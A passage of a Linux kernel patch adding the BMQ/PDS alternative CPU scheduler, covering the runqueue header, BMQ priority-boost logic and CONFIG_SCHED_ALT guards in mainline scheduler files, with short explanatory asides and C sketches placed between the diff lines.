++#ifndef ALT_SCHED_H
++#define ALT_SCHED_H
++
++#include <linux/context_tracking.h>
++#include <linux/psi.h>
++#include <linux/stop_machine.h>
++#include <linux/syscalls.h>
++#include <linux/tick.h>
++
++#include <trace/events/power.h>
++#include <trace/events/sched.h>
++
++#include "../workqueue_internal.h"
++
++#include "cpupri.h"
++
++#ifdef CONFIG_SCHED_BMQ
++/* bits:
++ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
++#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
++#endif
++
++#ifdef CONFIG_SCHED_PDS
++/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
++#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
++#endif /* CONFIG_SCHED_PDS */
++
++#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
++
++#ifdef CONFIG_SCHED_DEBUG
++# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
++extern void resched_latency_warn(int cpu, u64 latency);
++#else
++# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
++static inline void resched_latency_warn(int cpu, u64 latency) {}
++#endif
++
++/*
++ * Increase resolution of nice-level calculations for 64-bit architectures.
++ * The extra resolution improves shares distribution and load balancing of
++ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
++ * hierarchies, especially on larger systems. This is not a user-visible change
++ * and does not change the user-interface for setting shares/weights.
++ *
++ * We increase resolution only if we have enough bits to allow this increased
++ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
++ * are pretty high and the returns do not justify the increased costs.
++ *
++ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
++ * increase coverage and consistency always enable it on 64-bit platforms.
++ */
++#ifdef CONFIG_64BIT
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
++# define scale_load_down(w) \
++({ \
++	unsigned long __w = (w); \
++	if (__w) \
++		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
++	__w; \
++})
++#else
++# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
++# define scale_load(w)		(w)
++# define scale_load_down(w)	(w)
++#endif
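
As an aside, the 64-bit branch above is a plain fixed-point scheme. A standalone sketch of the round trip, not part of the patch and assuming mainline's SCHED_FIXEDPOINT_SHIFT of 10, under which the nice-0 weight 1024 becomes 1048576 internally:

    #include <stdio.h>

    #define SCHED_FIXEDPOINT_SHIFT 10	/* assumed mainline value */
    #define scale_load(w)	((unsigned long)(w) << SCHED_FIXEDPOINT_SHIFT)

    /* Mirror of the macro above: shift back down, but never below 2. */
    static unsigned long scale_load_down(unsigned long w)
    {
    	if (w)
    		w = (w >> SCHED_FIXEDPOINT_SHIFT) > 2UL ?
    			(w >> SCHED_FIXEDPOINT_SHIFT) : 2UL;
    	return w;
    }

    int main(void)
    {
    	unsigned long shares = scale_load(1024);	/* 1048576 */

    	printf("%lu -> %lu\n", shares, scale_load_down(shares)); /* -> 1024 */
    	return 0;
    }

The floor of 2 is what keeps a nonzero weight from collapsing to 0 or 1, which the comment further down warns can cause arithmetic problems.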
++
++#ifdef CONFIG_FAIR_GROUP_SCHED
++#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
++
++/*
++ * A weight of 0 or 1 can cause arithmetic problems.
++ * The weight of a cfs_rq is the sum of the weights of the entities
++ * queued on that cfs_rq, so the weight of an entity should not be
++ * too large, and neither should the shares value of a task group.
++ * (The default weight is 1024 - so there's no practical
++ *  limitation from this.)
++ */
++#define MIN_SHARES		(1UL <<  1)
++#define MAX_SHARES		(1UL << 18)
++#endif
++
++/*
++ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
++ */
++#ifdef CONFIG_SCHED_DEBUG
++# define const_debug __read_mostly
++#else
++# define const_debug const
++#endif
++
++/* task_struct::on_rq states: */
++#define TASK_ON_RQ_QUEUED	1
++#define TASK_ON_RQ_MIGRATING	2
++
++static inline int task_on_rq_queued(struct task_struct *p)
++{
++	return p->on_rq == TASK_ON_RQ_QUEUED;
++}
++
++static inline int task_on_rq_migrating(struct task_struct *p)
++{
++	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
++}
++
++/*
++ * wake flags
++ */
++#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
++#define WF_FORK		0x02		/* child wakeup after fork */
++#define WF_MIGRATED	0x04		/* internal use, task got migrated */
++
++#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
++
++struct sched_queue {
++	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
++	struct list_head heads[SCHED_BITS];
++};
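
This queue is the central BMQ/PDS data structure: one list head per priority plus a bitmap of non-empty lists, so picking the next task reduces to "find the first set bit, take the head of that list". A standalone sketch of that pick, not part of the patch, using a single word and a GCC builtin in place of find_first_bit():

    #include <stdio.h>

    int main(void)
    {
    	unsigned long bitmap = 0;	/* one word stands in for the real bitmap */

    	bitmap |= 1UL << 3;	/* a task queued at priority 3 */
    	bitmap |= 1UL << 60;	/* e.g. the idle task at a high index */

    	/* Lowest set bit == highest-priority non-empty list. */
    	printf("next prio: %d\n", __builtin_ctzl(bitmap)); /* -> 3 */
    	return 0;
    }

Because the idle task always sits at IDLE_TASK_SCHED_PRIO, the bitmap is never empty and the lookup never fails.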
++
++struct rq;
++struct balance_callback {
++	struct balance_callback *next;
++	void (*func)(struct rq *rq);
++};
++
++/*
++ * This is the main, per-CPU runqueue data structure.
++ * This data should only be modified by the local cpu.
++ */
++struct rq {
++	/* runqueue lock: */
++	raw_spinlock_t lock;
++
++	struct task_struct __rcu *curr;
++	struct task_struct *idle, *stop, *skip;
++	struct mm_struct *prev_mm;
++
++	struct sched_queue	queue;
++#ifdef CONFIG_SCHED_PDS
++	u64			time_edge;
++#endif
++	unsigned long watermark;
++
++	/* switch count */
++	u64 nr_switches;
++
++	atomic_t nr_iowait;
++
++#ifdef CONFIG_SCHED_DEBUG
++	u64 last_seen_need_resched_ns;
++	int ticks_without_resched;
++#endif
++
++#ifdef CONFIG_MEMBARRIER
++	int membarrier_state;
++#endif
++
++#ifdef CONFIG_SMP
++	int cpu;		/* cpu of this runqueue */
++	bool online;
++
++	unsigned int		ttwu_pending;
++	unsigned char		nohz_idle_balance;
++	unsigned char		idle_balance;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	struct sched_avg	avg_irq;
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++	int active_balance;
++	struct cpu_stop_work	active_balance_work;
++#endif
++	struct balance_callback	*balance_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++	struct rcuwait		hotplug_wait;
++#endif
++	unsigned int		nr_pinned;
++
++#endif /* CONFIG_SMP */
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	u64 prev_irq_time;
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++#ifdef CONFIG_PARAVIRT
++	u64 prev_steal_time;
++#endif /* CONFIG_PARAVIRT */
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	u64 prev_steal_time_rq;
++#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
++
++	/* For general cpu load util */
++	s32 load_history;
++	u64 load_block;
++	u64 load_stamp;
++
++	/* calc_load related fields */
++	unsigned long calc_load_update;
++	long calc_load_active;
++
++	u64 clock, last_tick;
++	u64 last_ts_switch;
++	u64 clock_task;
++
++	unsigned int  nr_running;
++	unsigned long nr_uninterruptible;
++
++#ifdef CONFIG_SCHED_HRTICK
++#ifdef CONFIG_SMP
++	call_single_data_t hrtick_csd;
++#endif
++	struct hrtimer		hrtick_timer;
++	ktime_t			hrtick_time;
++#endif
++
++#ifdef CONFIG_SCHEDSTATS
++
++	/* latency stats */
++	struct sched_info rq_sched_info;
++	unsigned long long rq_cpu_time;
++	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
++
++	/* sys_sched_yield() stats */
++	unsigned int yld_count;
++
++	/* schedule() stats */
++	unsigned int sched_switch;
++	unsigned int sched_count;
++	unsigned int sched_goidle;
++
++	/* try_to_wake_up() stats */
++	unsigned int ttwu_count;
++	unsigned int ttwu_local;
++#endif /* CONFIG_SCHEDSTATS */
++
++#ifdef CONFIG_CPU_IDLE
++	/* Must be inspected within a rcu lock section */
++	struct cpuidle_state *idle_state;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++#ifdef CONFIG_SMP
++	call_single_data_t	nohz_csd;
++#endif
++	atomic_t		nohz_flags;
++#endif /* CONFIG_NO_HZ_COMMON */
++};
++
++extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
++
++extern unsigned long calc_load_update;
++extern atomic_long_t calc_load_tasks;
++
++extern void calc_global_load_tick(struct rq *this_rq);
++extern long calc_load_fold_active(struct rq *this_rq, long adjust);
++
++DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
++#define this_rq()		this_cpu_ptr(&runqueues)
++#define task_rq(p)		cpu_rq(task_cpu(p))
++#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
++#define raw_rq()		raw_cpu_ptr(&runqueues)
++
++#ifdef CONFIG_SMP
++#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
++void register_sched_domain_sysctl(void);
++void unregister_sched_domain_sysctl(void);
++#else
++static inline void register_sched_domain_sysctl(void)
++{
++}
++static inline void unregister_sched_domain_sysctl(void)
++{
++}
++#endif
++
++extern bool sched_smp_initialized;
++
++enum {
++	ITSELF_LEVEL_SPACE_HOLDER,
++#ifdef CONFIG_SCHED_SMT
++	SMT_LEVEL_SPACE_HOLDER,
++#endif
++	COREGROUP_LEVEL_SPACE_HOLDER,
++	CORE_LEVEL_SPACE_HOLDER,
++	OTHER_LEVEL_SPACE_HOLDER,
++	NR_CPU_AFFINITY_LEVELS
++};
++
++DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++
++static inline int
++__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
++{
++	int cpu;
++
++	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
++		mask++;
++
++	return cpu;
++}
++
++static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
++{
++	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
++}
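
A userspace sketch of this nearest-first walk, not part of the patch, with plain words standing in for cpumask_t; as in the real code, the walk terminates because the last level is assumed to cover all CPUs:

    #include <stdio.h>

    int main(void)
    {
    	/* Levels for CPU 0: itself, SMT sibling, LLC, everything. */
    	unsigned long topo[4] = { 0x1, 0x3, 0xf, 0xff };
    	unsigned long allowed = 0xc;	/* task may run on CPUs 2 and 3 */
    	int level = 0;

    	/* Walk outward until a level intersects the allowed set. */
    	while (!(topo[level] & allowed))
    		level++;

    	printf("level %d, cpu %d\n", level,
    	       __builtin_ctzl(topo[level] & allowed)); /* -> level 2, cpu 2 */
    	return 0;
    }

The real per-CPU sched_cpu_topo_masks array is built the same nearest-first way, which is what lets best_mask_cpu() prefer an SMT sibling over a same-LLC CPU over anything farther away.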
++
++extern void flush_smp_call_function_queue(void);
++
++#else  /* !CONFIG_SMP */
++static inline void flush_smp_call_function_queue(void) { }
++#endif
++
++#ifndef arch_scale_freq_tick
++static __always_inline
++void arch_scale_freq_tick(void)
++{
++}
++#endif
++
++#ifndef arch_scale_freq_capacity
++static __always_inline
++unsigned long arch_scale_freq_capacity(int cpu)
++{
++	return SCHED_CAPACITY_SCALE;
++}
++#endif
++
++static inline u64 __rq_clock_broken(struct rq *rq)
++{
++	return READ_ONCE(rq->clock);
++}
++
++static inline u64 rq_clock(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ: a call to
++	 * sched_info_xxxx() may not hold rq->lock.
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock;
++}
++
++static inline u64 rq_clock_task(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ: a call to
++	 * sched_info_xxxx() may not hold rq->lock.
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock_task;
++}
++
++/*
++ * {de,en}queue flags:
++ *
++ * DEQUEUE_SLEEP  - task is no longer runnable
++ * ENQUEUE_WAKEUP - task just became runnable
++ *
++ */
++
++#define DEQUEUE_SLEEP		0x01
++
++#define ENQUEUE_WAKEUP		0x01
++
++
++/*
++ * Below are the scheduler APIs used by other kernel code.
++ * They use a dummy rq_flags.
++ * TODO: BMQ needs to support these APIs for compatibility with mainline
++ * scheduler code.
++ */
++struct rq_flags {
++	unsigned long flags;
++};
++
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock);
++
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock);
++
++static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++}
++
++static inline void
++rq_lock(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline struct rq *
++this_rq_lock_irq(struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	local_irq_disable();
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	return rq;
++}
++
++static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
++{
++	return &rq->lock;
++}
++
++static inline raw_spinlock_t *rq_lockp(struct rq *rq)
++{
++	return __rq_lockp(rq);
++}
++
++static inline void lockdep_assert_rq_held(struct rq *rq)
++{
++	lockdep_assert_held(__rq_lockp(rq));
++}
++
++extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
++extern void raw_spin_rq_unlock(struct rq *rq);
++
++static inline void raw_spin_rq_lock(struct rq *rq)
++{
++	raw_spin_rq_lock_nested(rq, 0);
++}
++
++static inline void raw_spin_rq_lock_irq(struct rq *rq)
++{
++	local_irq_disable();
++	raw_spin_rq_lock(rq);
++}
++
++static inline void raw_spin_rq_unlock_irq(struct rq *rq)
++{
++	raw_spin_rq_unlock(rq);
++	local_irq_enable();
++}
++
++static inline int task_current(struct rq *rq, struct task_struct *p)
++{
++	return rq->curr == p;
++}
++
++static inline bool task_on_cpu(struct task_struct *p)
++{
++	return p->on_cpu;
++}
++
++extern int task_running_nice(struct task_struct *p);
++
++extern struct static_key_false sched_schedstats;
++
++#ifdef CONFIG_CPU_IDLE
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++	rq->idle_state = idle_state;
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	WARN_ON(!rcu_read_lock_held());
++	return rq->idle_state;
++}
++#else
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	return NULL;
++}
++#endif
++
++static inline int cpu_of(const struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	return rq->cpu;
++#else
++	return 0;
++#endif
++}
++
++#include "stats.h"
++
++#ifdef CONFIG_NO_HZ_COMMON
++#define NOHZ_BALANCE_KICK_BIT	0
++#define NOHZ_STATS_KICK_BIT	1
++
++#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
++#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
++
++#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
++
++#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
++
++/* TODO: needed?
++extern void nohz_balance_exit_idle(struct rq *rq);
++#else
++static inline void nohz_balance_exit_idle(struct rq *rq) { }
++*/
++#endif
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++struct irqtime {
++	u64			total;
++	u64			tick_delta;
++	u64			irq_start_time;
++	struct u64_stats_sync	sync;
++};
++
++DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
++
++/*
++ * Returns the irqtime minus the softirq time computed by ksoftirqd.
++ * Otherwise ksoftirqd's sum_exec_runtime would have its own runtime
++ * subtracted and would never move forward.
++ */
++static inline u64 irq_time_read(int cpu)
++{
++	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
++	unsigned int seq;
++	u64 total;
++
++	do {
++		seq = __u64_stats_fetch_begin(&irqtime->sync);
++		total = irqtime->total;
++	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
++
++	return total;
++}
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++
++#ifdef CONFIG_CPU_FREQ
++DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++extern int __init sched_tick_offload_init(void);
++#else
++static inline int sched_tick_offload_init(void) { return 0; }
++#endif
++
++#ifdef arch_scale_freq_capacity
++#ifndef arch_scale_freq_invariant
++#define arch_scale_freq_invariant()	(true)
++#endif
++#else /* arch_scale_freq_capacity */
++#define arch_scale_freq_invariant()	(false)
++#endif
++
++extern void schedule_idle(void);
++
++#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
++
++/*
++ * !! For sched_setattr_nocheck() (kernel) only !!
++ *
++ * This is actually gross. :(
++ *
++ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
++ * tasks, but still be able to sleep. We need this on platforms that cannot
++ * atomically change clock frequency. Remove once fast switching will be
++ * available on such platforms.
++ *
++ * SUGOV stands for SchedUtil GOVernor.
++ */
++#define SCHED_FLAG_SUGOV	0x10000000
++
++#ifdef CONFIG_MEMBARRIER
++/*
++ * The scheduler provides memory barriers required by membarrier between:
++ * - prior user-space memory accesses and store to rq->membarrier_state,
++ * - store to rq->membarrier_state and following user-space memory accesses.
++ * In the same way it provides those guarantees around store to rq->curr.
++ */
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++	int membarrier_state;
++
++	if (prev_mm == next_mm)
++		return;
++
++	membarrier_state = atomic_read(&next_mm->membarrier_state);
++	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
++		return;
++
++	WRITE_ONCE(rq->membarrier_state, membarrier_state);
++}
++#else
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++}
++#endif
++
++#ifdef CONFIG_NUMA
++extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
++#else
++static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return nr_cpu_ids;
++}
++#endif
++
++extern void swake_up_all_locked(struct swait_queue_head *q);
++extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++extern int preempt_dynamic_mode;
++extern int sched_dynamic_mode(const char *str);
++extern void sched_dynamic_update(int mode);
++#endif
++
++static inline void nohz_run_idle_balance(int cpu) { }
++
++static inline
++unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
++				  struct task_struct *p)
++{
++	return util;
++}
++
++static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
++
++#endif /* ALT_SCHED_H */
+diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
+new file mode 100644
+index 000000000000..66b77291b9d0
+--- /dev/null
++++ b/kernel/sched/bmq.h
+@@ -0,0 +1,110 @@
++#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++/*
++ * BMQ only routines
++ */
++#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
++#define boost_threshold(p)	(sched_timeslice_ns >>\
++				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
++
++static inline void boost_task(struct task_struct *p)
++{
++	int limit;
++
++	switch (p->policy) {
++	case SCHED_NORMAL:
++		limit = -MAX_PRIORITY_ADJ;
++		break;
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		limit = 0;
++		break;
++	default:
++		return;
++	}
++
++	if (p->boost_prio > limit)
++		p->boost_prio--;
++}
++
++static inline void deboost_task(struct task_struct *p)
++{
++	if (p->boost_prio < MAX_PRIORITY_ADJ)
++		p->boost_prio++;
++}
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms) {}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	return p->prio + p->boost_prio - MAX_RT_PRIO;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
++}
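
A worked example of the mapping above, not part of the patch and assuming the mainline MAX_RT_PRIO of 100: RT priorities pass through unchanged, while normal tasks land in the upper half of the range, nudged by boost_prio:

    #include <stdio.h>

    #define MAX_RT_PRIO 100	/* assumed mainline value */

    /* Same arithmetic as the BMQ task_sched_prio() above. */
    static int task_sched_prio(int prio, int boost_prio)
    {
    	return prio < MAX_RT_PRIO ? prio
    				  : MAX_RT_PRIO / 2 + (prio + boost_prio) / 2;
    }

    int main(void)
    {
    	printf("%d %d %d\n",
    	       task_sched_prio(10, 0),    /* RT task: stays 10 */
    	       task_sched_prio(120, 0),   /* nice 0: 50 + 60 = 110 */
    	       task_sched_prio(120, -2)); /* boosted: 50 + 59 = 109 */
    	return 0;
    }

So a two-step boost moves a nice-0 task one queue ahead of its unboosted peers, which is the whole interactivity mechanism in BMQ.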
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return task_sched_prio(p);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return prio;
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return idx;
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
++		if (SCHED_RR != p->policy)
++			deboost_task(p);
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++	}
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
++
++inline int task_running_nice(struct task_struct *p)
++{
++	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p)
++{
++	if (this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
++		boost_task(p);
++}
++#endif
++
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
++{
++	if (rq_switch_time(rq) < boost_threshold(p))
++		boost_task(p);
++}
++
++static inline void update_rq_time_edge(struct rq *rq) {}
+diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
+index d9dc9ab3773f..71a25540d65e 100644
+--- a/kernel/sched/build_policy.c
++++ b/kernel/sched/build_policy.c
+@@ -42,13 +42,19 @@
+ 
+ #include "idle.c"
+ 
++#ifndef CONFIG_SCHED_ALT
+ #include "rt.c"
++#endif
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ # include "cpudeadline.c"
++#endif
+ # include "pelt.c"
+ #endif
+ 
+ #include "cputime.c"
+-#include "deadline.c"
+ 
++#ifndef CONFIG_SCHED_ALT
++#include "deadline.c"
++#endif
+diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
+index 99bdd96f454f..23f80a86d2d7 100644
+--- a/kernel/sched/build_utility.c
++++ b/kernel/sched/build_utility.c
+@@ -85,7 +85,9 @@
+ 
+ #ifdef CONFIG_SMP
+ # include "cpupri.c"
++#ifndef CONFIG_SCHED_ALT
+ # include "stop_task.c"
++#endif
+ # include "topology.c"
+ #endif
+ 
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c1..68812e0756cb 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
+ 	struct rq *rq = cpu_rq(sg_cpu->cpu);
+ 
+ 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
++#ifndef CONFIG_SCHED_ALT
+ 	sg_cpu->bw_dl = cpu_bw_dl(rq);
+ 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
+ 					  FREQUENCY_UTIL, NULL);
++#else
++	sg_cpu->bw_dl = 0;
++	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
++#endif /* CONFIG_SCHED_ALT */
+ }
+ 
+ /**
+@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
+  */
+ static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
+ 		sg_cpu->sg_policy->limits_changed = true;
++#endif
+ }
+ 
+ static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
+@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
+ 	}
+ 
+ 	ret = sched_setattr_nocheck(thread, &attr);
++
+ 	if (ret) {
+ 		kthread_stop(thread);
+ 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
+@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
+ #ifdef CONFIG_ENERGY_MODEL
+ static void rebuild_sd_workfn(struct work_struct *work)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	rebuild_sched_domains_energy();
++#endif /* CONFIG_SCHED_ALT */
+ }
+ static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
+ 
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc77853743..b48b3f9ed47f 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
+ 	p->utime += cputime;
+ 	account_group_user_time(p, cputime);
+ 
+-	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
++	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
+ 
+ 	/* Add user time to cpustat. */
+ 	task_group_account_field(p, index, cputime);
+@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
+ 	p->gtime += cputime;
+ 
+ 	/* Add guest time to cpustat. */
+-	if (task_nice(p) > 0) {
++	if (task_running_nice(p)) {
+ 		task_group_account_field(p, CPUTIME_NICE, cputime);
+ 		cpustat[CPUTIME_GUEST_NICE] += cputime;
+ 	} else {
+@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
+ #ifdef CONFIG_64BIT
+ static inline u64 read_sum_exec_runtime(struct task_struct *t)
+ {
+-	return t->se.sum_exec_runtime;
++	return tsk_seruntime(t);
+ }
+ #else
+ static u64 read_sum_exec_runtime(struct task_struct *t)
+@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
+ 	struct rq *rq;
+ 
+ 	rq = task_rq_lock(t, &rf);
+-	ns = t->se.sum_exec_runtime;
++	ns = tsk_seruntime(t);
+ 	task_rq_unlock(rq, t, &rf);
+ 
+ 	return ns;
+@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
+ {
+ 	struct task_cputime cputime = {
+-		.sum_exec_runtime = p->se.sum_exec_runtime,
++		.sum_exec_runtime = tsk_seruntime(p),
+ 	};
+ 
+ 	if (task_cputime(p, &cputime.utime, &cputime.stime))
+diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
+index 1637b65ba07a..033c6deeb515 100644
+--- a/kernel/sched/debug.c
++++ b/kernel/sched/debug.c
+@@ -7,6 +7,7 @@
+  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * This allows printing both to /proc/sched_debug and
+  * to the console
+@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
